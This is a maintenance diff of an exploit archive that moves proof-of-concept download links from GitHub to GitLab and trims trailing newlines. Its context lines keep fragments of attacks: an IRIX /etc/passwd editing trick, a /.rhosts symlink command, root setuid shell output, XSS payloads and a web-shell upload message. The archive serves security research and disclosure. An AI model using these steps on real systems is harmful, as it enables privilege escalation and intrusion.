100644 --- a/exploits/ios/remote/4522.html +++ b/exploits/ios/remote/4522.html @@ -27,7 +27,7 @@ EDB Note: Old filename: 10112007-iphone.tif --> <html> -<img src="https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4522.tif"> +<img src="https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4522.tif"> </html> # milw0rm.com [2007-10-11] \ No newline at end of file diff --git a/exploits/irix/local/19210.txt b/exploits/irix/local/19210.txt index 93a0a9dc5..25db0dee8 100644 --- a/exploits/irix/local/19210.txt +++ b/exploits/irix/local/19210.txt @@ -18,4 +18,4 @@ under the midikeys window click sounds and then midi songs. This will open a fil You can enter the path and filename of files you which to read, including root owned with group/world read/write permissions unset. -If you select a file like "/usr/share/data/music/README" it will appear in a text editor. Use the text editor to open /etc/passwd and make modifications at will. Save and enjoy. +If you select a file like "/usr/share/data/music/README" it will appear in a text editor. Use the text editor to open /etc/passwd and make modifications at will. Save and enjoy. \ No newline at end of file diff --git a/exploits/irix/local/19280.txt b/exploits/irix/local/19280.txt index fec8ef546..1959fdf98 100644 --- a/exploits/irix/local/19280.txt +++ b/exploits/irix/local/19280.txt @@ -34,7 +34,4 @@ cd /tmp ln -s /.rhosts fsdump.dir /var/rfindd/fsdump -Fgimme / ls -al /.rhosts -rm -f fsdump.dir fsdump.pag gimme - - - +rm -f fsdump.dir fsdump.pag gimme \ No newline at end of file diff --git a/exploits/irix/local/19353.txt b/exploits/irix/local/19353.txt index 07fcb901a..de75ae7f2 100644 --- a/exploits/irix/local/19353.txt +++ b/exploits/irix/local/19353.txt @@ -20,7 +20,4 @@ execl("/sbin/suid_exec","/bin/su","/bin/su",0); % ./expl Too many ('s. % ls -l /tmp/sh --r-sr-sr-x 1 root sys 140784 Dec 2 19:21 /tmp/sh* - - - +-r-sr-sr-x 1 root sys 140784 Dec 2 19:21 /tmp/sh* \ No newline at end of file diff --git a/exploits/java/dos/41965.txt b/exploits/java/dos/41965.txt index a6599b310..1a03e1d49 100644 --- a/exploits/java/dos/41965.txt +++ b/exploits/java/dos/41965.txt @@ -21,4 +21,4 @@ The second step is to change python script jenkins_poc1.py: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41965.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41965.zip \ No newline at end of file diff --git a/exploits/java/dos/46409.txt b/exploits/java/dos/46409.txt index a1202846e..e8958a67d 100644 --- a/exploits/java/dos/46409.txt +++ b/exploits/java/dos/46409.txt @@ -91,4 +91,4 @@ Attached with this report are three mutated testcases, and a simple Java program Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46409.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46409.zip \ No newline at end of file diff --git a/exploits/java/dos/46410.txt b/exploits/java/dos/46410.txt index e5bc6f5b0..1a9e975f3 100644 --- a/exploits/java/dos/46410.txt +++ b/exploits/java/dos/46410.txt @@ -93,4 +93,4 @@ Attached with this report are three mutated testcases, and a simple Java program Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46410.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46410.zip \ No newline at end of file diff --git a/exploits/java/dos/46411.txt b/exploits/java/dos/46411.txt index 9b34805bd..8a3d87cc3 100644 --- a/exploits/java/dos/46411.txt +++ b/exploits/java/dos/46411.txt @@ -88,4 +88,4 @@ Attached with this report are three mutated testcases, and a simple Java program Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46411.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46411.zip \ No newline at end of file diff --git a/exploits/java/dos/46412.txt b/exploits/java/dos/46412.txt index 5e4484eda..7393d9adf 100644 --- a/exploits/java/dos/46412.txt +++ b/exploits/java/dos/46412.txt @@ -85,4 +85,4 @@ Attached with this report is the mutated testcase, and a simple Java program use Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46412.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46412.zip \ No newline at end of file diff --git a/exploits/java/remote/30502.txt b/exploits/java/remote/30502.txt index a2577a25f..79fdf5551 100644 --- a/exploits/java/remote/30502.txt +++ b/exploits/java/remote/30502.txt @@ -4,4 +4,4 @@ The Sun Java Runtime Environment is prone to a remote privilege-escalation vulne An attacker can exploit this issue to execute arbitrary code within the context of the user who invoked the Java applet. Successfully exploiting this issue may result in the remote compromise of affected computers. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30502.tti \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30502.tti \ No newline at end of file diff --git a/exploits/java/remote/39007.txt b/exploits/java/remote/39007.txt index d05d6c1ad..0ca363be1 100644 --- a/exploits/java/remote/39007.txt +++ b/exploits/java/remote/39007.txt @@ -66,4 +66,4 @@ The Jasmin file we used is attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39007.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39007.zip \ No newline at end of file diff --git a/exploits/java/remote/39854.txt b/exploits/java/remote/39854.txt index 596682503..f23d26e64 100644 --- a/exploits/java/remote/39854.txt +++ b/exploits/java/remote/39854.txt @@ -55,7 +55,7 @@ Proof of concept: A simple PoC can be found here: https://github.com/h0ng10/powerfolder-exploit-poc -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39854.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39854.zip Disclosure timeline: ---------------------------------------------------------------------- diff --git a/exploits/java/remote/42701.rb b/exploits/java/remote/42701.rb index 17d378c40..899e99486 100755 --- a/exploits/java/remote/42701.rb +++ b/exploits/java/remote/42701.rb @@ -75,4 +75,4 @@ class MetasploitModule < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/exploits/java/remote/42702.rb b/exploits/java/remote/42702.rb index 14bb0a59f..4fe188c4d 100755 --- a/exploits/java/remote/42702.rb +++ b/exploits/java/remote/42702.rb @@ -75,4 +75,4 @@ class MetasploitModule < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/exploits/java/remote/42756.py b/exploits/java/remote/42756.py index 731ee53d3..83365d5a5 100755 --- a/exploits/java/remote/42756.py +++ b/exploits/java/remote/42756.py @@ -101,4 +101,4 @@ if __name__ == "__main__": else: print "[-] Can't load ysoserial.jar" else: - printUsage() + printUsage() \ No newline at end of file diff --git a/exploits/java/webapps/40817.txt b/exploits/java/webapps/40817.txt index 3ff9a2b8c..a8ca03757 100644 --- a/exploits/java/webapps/40817.txt +++ b/exploits/java/webapps/40817.txt @@ -90,7 +90,7 @@ The vulnerability allows remote attackers to permanently embed arbitrary script 7. POC =========== -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40817.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40817.zip 8. SOLUTION =========== diff --git a/exploits/java/webapps/40842.txt b/exploits/java/webapps/40842.txt index b0ba84686..83e3a5066 100644 --- a/exploits/java/webapps/40842.txt +++ b/exploits/java/webapps/40842.txt @@ -62,7 +62,7 @@ support and JBoss EAP 5 is close to the end of its maintenance period. See jboss_payload.zip (40842.zip) and Example Attack Session above. http://lab.mediaservice.net/code/jboss_payload.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40842.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40842.zip 6. Timeline @@ -74,4 +74,4 @@ Copyright (c) 2016 @ Mediaservice.net Srl. All rights reserved. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40842.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40842.zip \ No newline at end of file diff --git a/exploits/java/webapps/42543.txt b/exploits/java/webapps/42543.txt index cb310ec19..481170e8b 100644 --- a/exploits/java/webapps/42543.txt +++ b/exploits/java/webapps/42543.txt @@ -61,4 +61,4 @@ Host: TARGET GET http://TARGET/touch.txt HTTP/1.1 -peend +peend \ No newline at end of file diff --git a/exploits/java/webapps/42544.py b/exploits/java/webapps/42544.py index bd8ea4a6f..25f1d77a0 100755 --- a/exploits/java/webapps/42544.py +++ b/exploits/java/webapps/42544.py @@ -228,4 +228,4 @@ print '[+] Payload uploaded.' print '[+] Shell available at: http://'+host+'/'+filename[:-4] print -sys.exit() +sys.exit() \ No newline at end of file diff --git a/exploits/java/webapps/43114.py b/exploits/java/webapps/43114.py index 8dd236693..375d4a596 100755 --- a/exploits/java/webapps/43114.py +++ b/exploits/java/webapps/43114.py @@ -371,4 +371,4 @@ try: except RuntimeError as e: o('-', e) finally: - x.service_undeploy() + x.service_undeploy() \ No newline at end of file diff --git a/exploits/json/webapps/42579.txt b/exploits/json/webapps/42579.txt index 7e3295df7..58a7a4f39 100644 --- a/exploits/json/webapps/42579.txt +++ b/exploits/json/webapps/42579.txt @@ -56,5 +56,4 @@ Content-Type: application/x-xz Content-Disposition: form-data; name="BackupConfig[Upload][Description]" <script>confirm(017)</script> -------WebKitFormBoundary8FfEu2Tn6fUOnT80-- - +------WebKitFormBoundary8FfEu2Tn6fUOnT80-- \ No newline at end of file diff --git a/exploits/json/webapps/42580.html b/exploits/json/webapps/42580.html index 8b707fb52..41b44b170 100644 --- a/exploits/json/webapps/42580.html +++ b/exploits/json/webapps/42580.html @@ -55,4 +55,4 @@ HTML Decoded PoC: <input type="submit" value="Submit request" /> </form> </body> -</html> +</html> \ No newline at end of file diff --git a/exploits/jsp/remote/18179.html b/exploits/jsp/remote/18179.html index 9530339e4..e642c9f2e 100644 --- a/exploits/jsp/remote/18179.html +++ b/exploits/jsp/remote/18179.html @@ -65,8 +65,4 @@ height = "99%" <PARAM NAME="onLoad" VALUE="onLoadConsole"> </applet> </body> -</html> - - - - +</html> \ No newline at end of file diff --git a/exploits/jsp/remote/42698.rb b/exploits/jsp/remote/42698.rb index eb976fc9e..4342626f4 100755 --- a/exploits/jsp/remote/42698.rb +++ b/exploits/jsp/remote/42698.rb @@ -111,4 +111,4 @@ class MetasploitModule < Msf::Auxiliary end end -end +end \ No newline at end of file diff --git a/exploits/jsp/webapps/15997.py b/exploits/jsp/webapps/15997.py index a4340612d..6367c6580 100755 --- a/exploits/jsp/webapps/15997.py +++ b/exploits/jsp/webapps/15997.py @@ -198,4 +198,4 @@ if __name__ == "__main__": interactiveAttack(myopener) elif options.csrf: writeCsrf() - addadmin = "" + addadmin = "" \ No newline at end of file diff --git a/exploits/jsp/webapps/17503.pl b/exploits/jsp/webapps/17503.pl index 27ccfc4b4..e80ddb5e0 100755 --- a/exploits/jsp/webapps/17503.pl +++ b/exploits/jsp/webapps/17503.pl @@ -430,7 +430,4 @@ $ret=$paths[$i]; return $ret; -} - - - +} \ No newline at end of file diff --git a/exploits/jsp/webapps/35910.txt b/exploits/jsp/webapps/35910.txt index 7cf57c69f..2fc595231 100644 --- a/exploits/jsp/webapps/35910.txt +++ b/exploits/jsp/webapps/35910.txt @@ -52,5 +52,4 @@ http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13'%22()%26%25<ahy><ScRiPt Sobhan system Co. Signal Network And Security Group (www.signal-net.net) -E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net - +E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net \ No newline at end of file diff --git a/exploits/jsp/webapps/41577.txt b/exploits/jsp/webapps/41577.txt index 76497d593..e73fe54fb 100644 --- a/exploits/jsp/webapps/41577.txt +++ b/exploits/jsp/webapps/41577.txt @@ -36,4 +36,4 @@ Timeline: 12/1/2016 - Received response from vendor ("Thanks for the info...") 2/27/2017 - Followed up with contact and intent to disclose. No reply. 3/10/2017 - Disclosure -################################################################## +################################################################## \ No newline at end of file diff --git a/exploits/linux/dos/10203.txt b/exploits/linux/dos/10203.txt index 7f2a9b20f..d3ad897ed 100644 --- a/exploits/linux/dos/10203.txt +++ b/exploits/linux/dos/10203.txt @@ -61,4 +61,4 @@ Remote attackers may leverage this issue to cause denial-of-service conditions. NOTE: BibTeX may be shipped with various packages, such as TeTeX or TexLive, that may also be vulnerable. -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/10203.tar.bz2 (2009-11-22-bibtex-crash.tar.bz2) \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/10203.tar.bz2 (2009-11-22-bibtex-crash.tar.bz2) \ No newline at end of file diff --git a/exploits/linux/dos/10206.txt b/exploits/linux/dos/10206.txt index 82be64a76..3470e29cd 100644 --- a/exploits/linux/dos/10206.txt +++ b/exploits/linux/dos/10206.txt @@ -146,5 +146,5 @@ Exploiting this issue allows remote attackers to cause denial-of-service conditi Expat 2.0.1 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/10206-1.gz (2009-11-22-36097.gz) -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/10206-2.gz (2009-11-22-36097-2.gz) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/10206-1.gz (2009-11-22-36097.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/10206-2.gz (2009-11-22-36097-2.gz) \ No newline at end of file diff --git a/exploits/linux/dos/14573.txt b/exploits/linux/dos/14573.txt index 75c715c71..8254ab56f 100644 --- a/exploits/linux/dos/14573.txt +++ b/exploits/linux/dos/14573.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to crash an application that uses the vulnera Versions up to and including libTIFF 3.9.4 are vulnerable. PoC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14573.tif.gz (lp589145-sample.tif.gz) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14573.tif.gz (lp589145-sample.tif.gz) \ No newline at end of file diff --git a/exploits/linux/dos/15062.txt b/exploits/linux/dos/15062.txt index 23e4d2444..b5829f6fe 100644 --- a/exploits/linux/dos/15062.txt +++ b/exploits/linux/dos/15062.txt @@ -105,8 +105,4 @@ PoC ./rarcrack `perl -e 'print "A" x500'` -########################################################################### - - - - +########################################################################### \ No newline at end of file diff --git a/exploits/linux/dos/18295.txt b/exploits/linux/dos/18295.txt index 450af5a27..037cfdc78 100644 --- a/exploits/linux/dos/18295.txt +++ b/exploits/linux/dos/18295.txt @@ -218,5 +218,5 @@ Adam 'pi3' Zabrocki -- http://pi3.com.pl -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18295.c (p_cve-2011-4362.c) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18295.c (p_cve-2011-4362.c) http://blog.pi3.com.pl/?p=277 \ No newline at end of file diff --git a/exploits/linux/dos/18579.txt b/exploits/linux/dos/18579.txt index 77021b602..b33ddd8bd 100644 --- a/exploits/linux/dos/18579.txt +++ b/exploits/linux/dos/18579.txt @@ -102,4 +102,4 @@ References ========== [1] http://cwe.mitre.org/data/definitions/415.html [2] http://docs.python.org/release/1.5.2p2/ext/parseTuple.html -[3] https://issues.rpath.com/browse/RPL-2773 +[3] https://issues.rpath.com/browse/RPL-2773 \ No newline at end of file diff --git a/exploits/linux/dos/2051.py b/exploits/linux/dos/2051.py index 5f86492af..47db96853 100755 --- a/exploits/linux/dos/2051.py +++ b/exploits/linux/dos/2051.py @@ -294,4 +294,4 @@ xpl=substr(xpl, newtag, idx) xpl=substr(xpl,atom,len(xpl)) """ -# milw0rm.com [2006-07-21] +# milw0rm.com [2006-07-21] \ No newline at end of file diff --git a/exploits/linux/dos/21122.sh b/exploits/linux/dos/21122.sh index 4ebefa896..3bc383a19 100755 --- a/exploits/linux/dos/21122.sh +++ b/exploits/linux/dos/21122.sh @@ -36,6 +36,4 @@ mklink 2 mklink 1 mklink 0 /../../../../../../../etc/services mkdir l5 -mkdir l - - +mkdir l \ No newline at end of file diff --git a/exploits/linux/dos/23076.pl b/exploits/linux/dos/23076.pl index 1f8dfa7e9..1a3e2613b 100755 --- a/exploits/linux/dos/23076.pl +++ b/exploits/linux/dos/23076.pl @@ -86,5 +86,4 @@ foreach my $command (@commands) { $mysql->query($c); } } - $mysql->close; - + $mysql->close; \ No newline at end of file diff --git a/exploits/linux/dos/23427.txt b/exploits/linux/dos/23427.txt index 503196836..9e99d5597 100644 --- a/exploits/linux/dos/23427.txt +++ b/exploits/linux/dos/23427.txt @@ -52,4 +52,4 @@ si_addr:$2 = (void *) 0xaf625080 <gst_riff_create_audio_caps+1888> Proof of concept included. http://www41.zippyshare.com/v/13083235/file.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23427.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23427.rar \ No newline at end of file diff --git a/exploits/linux/dos/23757.txt b/exploits/linux/dos/23757.txt index 175531349..b31a45abc 100644 --- a/exploits/linux/dos/23757.txt +++ b/exploits/linux/dos/23757.txt @@ -4,4 +4,4 @@ It has been reported that the GameSpy SDK is prone to a remote denial of service Exploitation of this issue may cause the affected GameSpy developed game to crash, denying service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23757.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23757.zip \ No newline at end of file diff --git a/exploits/linux/dos/23946.c b/exploits/linux/dos/23946.c index 9aa73fc43..639193520 100644 --- a/exploits/linux/dos/23946.c +++ b/exploits/linux/dos/23946.c @@ -25,4 +25,4 @@ int main() while (1) sleep(1); -} +} \ No newline at end of file diff --git a/exploits/linux/dos/24815.txt b/exploits/linux/dos/24815.txt index 979b5bf8c..a7dcc1a5a 100644 --- a/exploits/linux/dos/24815.txt +++ b/exploits/linux/dos/24815.txt @@ -4,4 +4,4 @@ It has been reported that the GameSpy SDK is prone to a buffer overflow vulnerab Exploitation of this issue may allow attackers to execute arbitrary machine code in the context of the affected GameSpy developed game. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24815.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24815.zip \ No newline at end of file diff --git a/exploits/linux/dos/24865.txt b/exploits/linux/dos/24865.txt index 6e64295a6..b4ba3ad7d 100644 --- a/exploits/linux/dos/24865.txt +++ b/exploits/linux/dos/24865.txt @@ -10,7 +10,7 @@ Sorry I forgot to write headers in previous mail. # Tested on: [GNU/Linux] # CVE : [CVE-2012-1663] -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24865.tar.bz2 +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24865.tar.bz2 I'm glad to share this to you guys. The test code was attached. You also could find them here: diff --git a/exploits/linux/dos/27762.txt b/exploits/linux/dos/27762.txt index e26e8657c..e2f85be25 100644 --- a/exploits/linux/dos/27762.txt +++ b/exploits/linux/dos/27762.txt @@ -4,8 +4,8 @@ LibTIFF is affected by multiple denial-of-service vulnerabilities. An attacker can exploit these vulnerabilities to cause a denial of service in applications using the affected library. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27762-1.tiff.0 +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27762-1.tiff.0 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27762-2.tiff.1 +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27762-2.tiff.1 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27762-3.tiff.100 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27762-3.tiff.100 \ No newline at end of file diff --git a/exploits/linux/dos/27764.txt b/exploits/linux/dos/27764.txt index 482059426..d1ae12c3b 100644 --- a/exploits/linux/dos/27764.txt +++ b/exploits/linux/dos/27764.txt @@ -4,4 +4,4 @@ Applications using the LibTIFF library are prone to an integer-overflow vulnerab An attacker could exploit this vulnerability to execute arbitrary code in the context of the vulnerable application that uses the affected library. Failed exploit attempts will likely cause denial-of-service conditions. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27764.tiff.11 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27764.tiff.11 \ No newline at end of file diff --git a/exploits/linux/dos/27765.txt b/exploits/linux/dos/27765.txt index 46a56837b..e8b778dd5 100644 --- a/exploits/linux/dos/27765.txt +++ b/exploits/linux/dos/27765.txt @@ -4,4 +4,4 @@ Applications using the LibTIFF library are prone to a double-free vulnerability; Attackers may be able to exploit this issue to cause denial-of-service conditions in affected applications using a vulnerable version of the library; arbitrary code execution may also be possible. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27765.tiff.2 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27765.tiff.2 \ No newline at end of file diff --git a/exploits/linux/dos/27925.txt b/exploits/linux/dos/27925.txt index 1f1089eeb..7218d9692 100644 --- a/exploits/linux/dos/27925.txt +++ b/exploits/linux/dos/27925.txt @@ -6,4 +6,4 @@ This vulnerability allows local users to cause a kernel panic, denying further s This issue affects Linux kernel versions 2.6.15 through 2.6.17-rc5 on multiprocessor computers running SMP kernels. Other kernel versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27925.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27925.tgz \ No newline at end of file diff --git a/exploits/linux/dos/28348.txt b/exploits/linux/dos/28348.txt index dde95996d..21daf5b02 100644 --- a/exploits/linux/dos/28348.txt +++ b/exploits/linux/dos/28348.txt @@ -8,4 +8,4 @@ Exploiting this issue could allow attacker-supplied machine code to execute in t ClamAV versions 0.88.2 and 0.88.3 are vulnerable to this issue; prior versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28348.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28348.exe \ No newline at end of file diff --git a/exploits/linux/dos/28358.txt b/exploits/linux/dos/28358.txt index 33f28110a..731da84d7 100644 --- a/exploits/linux/dos/28358.txt +++ b/exploits/linux/dos/28358.txt @@ -6,4 +6,4 @@ Remote attackers may trigger this issue by sending crafted UDP datagrams to affe Linux kernel versions 2.6.14.4, 2.6.17.6, and 2.6.17.7 are vulnerable to this issue; other versions in the 2.6 series are also likely affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28358.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28358.tar.gz \ No newline at end of file diff --git a/exploits/linux/dos/28367.txt b/exploits/linux/dos/28367.txt index 5ee655d28..5df5f8b92 100644 --- a/exploits/linux/dos/28367.txt +++ b/exploits/linux/dos/28367.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to execute arbitrary code within the contex AlsaPlayer 0.99.76, the CVS version as of 9 Aug 2006, and prior versions are vulnerable to this issue; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28367.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28367.zip \ No newline at end of file diff --git a/exploits/linux/dos/28380.txt b/exploits/linux/dos/28380.txt index dab5c1d9c..32e9f2b56 100644 --- a/exploits/linux/dos/28380.txt +++ b/exploits/linux/dos/28380.txt @@ -6,4 +6,4 @@ Attackers may likely exploit this issue to execute arbitrary machine code in the Mozilla Firefox is vulnerable to this issue. Due to code reuse, other Mozilla products are also likely affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28380.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28380.zip \ No newline at end of file diff --git a/exploits/linux/dos/28383.txt b/exploits/linux/dos/28383.txt index b957038c3..5b5ea1f2c 100644 --- a/exploits/linux/dos/28383.txt +++ b/exploits/linux/dos/28383.txt @@ -6,4 +6,4 @@ This issue allows attackers to execute arbitrary machine code in the context of ImageMagick versions in the 6.x series, up to version 6.2.8, are vulnerable to this issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28383.sgi \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28383.sgi \ No newline at end of file diff --git a/exploits/linux/dos/28384.txt b/exploits/linux/dos/28384.txt index 0ff330f6d..e07492a42 100644 --- a/exploits/linux/dos/28384.txt +++ b/exploits/linux/dos/28384.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to execute arbitrary code within the contex Versions 2.1.2, SVN 8406, and prior are vulnerable to this issue; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28384.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28384.zip \ No newline at end of file diff --git a/exploits/linux/dos/28895.txt b/exploits/linux/dos/28895.txt index fbf0fe799..2f31c94c9 100644 --- a/exploits/linux/dos/28895.txt +++ b/exploits/linux/dos/28895.txt @@ -4,4 +4,4 @@ The Linux kernel is prone to a local denial-of-service vulnerability. An attacker can exploit this issue to crash the affected computer, denying service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28895.img.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28895.img.gz \ No newline at end of file diff --git a/exploits/linux/dos/28912.txt b/exploits/linux/dos/28912.txt index cc1ef671e..c5673f4ee 100644 --- a/exploits/linux/dos/28912.txt +++ b/exploits/linux/dos/28912.txt @@ -4,4 +4,4 @@ The Linux kernel is prone to a local denial-of-service vulnerability. This issue An attacker can exploit this issue to crash the affected computer, denying service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28912.iso.bz2 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28912.iso.bz2 \ No newline at end of file diff --git a/exploits/linux/dos/29399.txt b/exploits/linux/dos/29399.txt index 5c67f3863..bea097260 100644 --- a/exploits/linux/dos/29399.txt +++ b/exploits/linux/dos/29399.txt @@ -4,4 +4,4 @@ Multiple PDF readers are prone to multiple remote buffer-overflow vulnerabilitie An attacker may be able exploit this issue to execute arbitrary code within the context of the affected application. In some circumstances, the vulnerability can be exploited only to cause a denial of service. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29399.pdf \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29399.pdf \ No newline at end of file diff --git a/exploits/linux/dos/29520.txt b/exploits/linux/dos/29520.txt index abb7571d1..3f0f27933 100644 --- a/exploits/linux/dos/29520.txt +++ b/exploits/linux/dos/29520.txt @@ -4,4 +4,4 @@ Applications using the gtk2 library may be prone to a denial-of-service vulnerab An attacker can exploit this issue to crash applications on a victim's computer. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29520.mbox \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29520.mbox \ No newline at end of file diff --git a/exploits/linux/dos/29723.txt b/exploits/linux/dos/29723.txt index 3923482ef..bf0fdc287 100644 --- a/exploits/linux/dos/29723.txt +++ b/exploits/linux/dos/29723.txt @@ -10,4 +10,4 @@ Firefox 2.0.0.2 is prone to this issue; other versions may also be affected. GIMP version 2.2.12 is also reported vulnerable; a segmentation fault occurs when the application processes a malicious GIF image. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29723.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29723.zip \ No newline at end of file diff --git a/exploits/linux/dos/29809.txt b/exploits/linux/dos/29809.txt index c80e00a02..61f55c51a 100644 --- a/exploits/linux/dos/29809.txt +++ b/exploits/linux/dos/29809.txt @@ -6,4 +6,4 @@ Exploiting this issue allows remote attackers to consume excessive system resour PulseAudio 0.9.5 is vulnerable to this issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29809.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29809.zip \ No newline at end of file diff --git a/exploits/linux/dos/30024.txt b/exploits/linux/dos/30024.txt index 51fa5a230..ad9af3044 100644 --- a/exploits/linux/dos/30024.txt +++ b/exploits/linux/dos/30024.txt @@ -6,4 +6,4 @@ Successful exploits of this vulnerability allow remote attackers to execute arbi Versions of libexif prior to 0.6.14 are vulnerable to this issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30024.jpg \ No newline at end of file 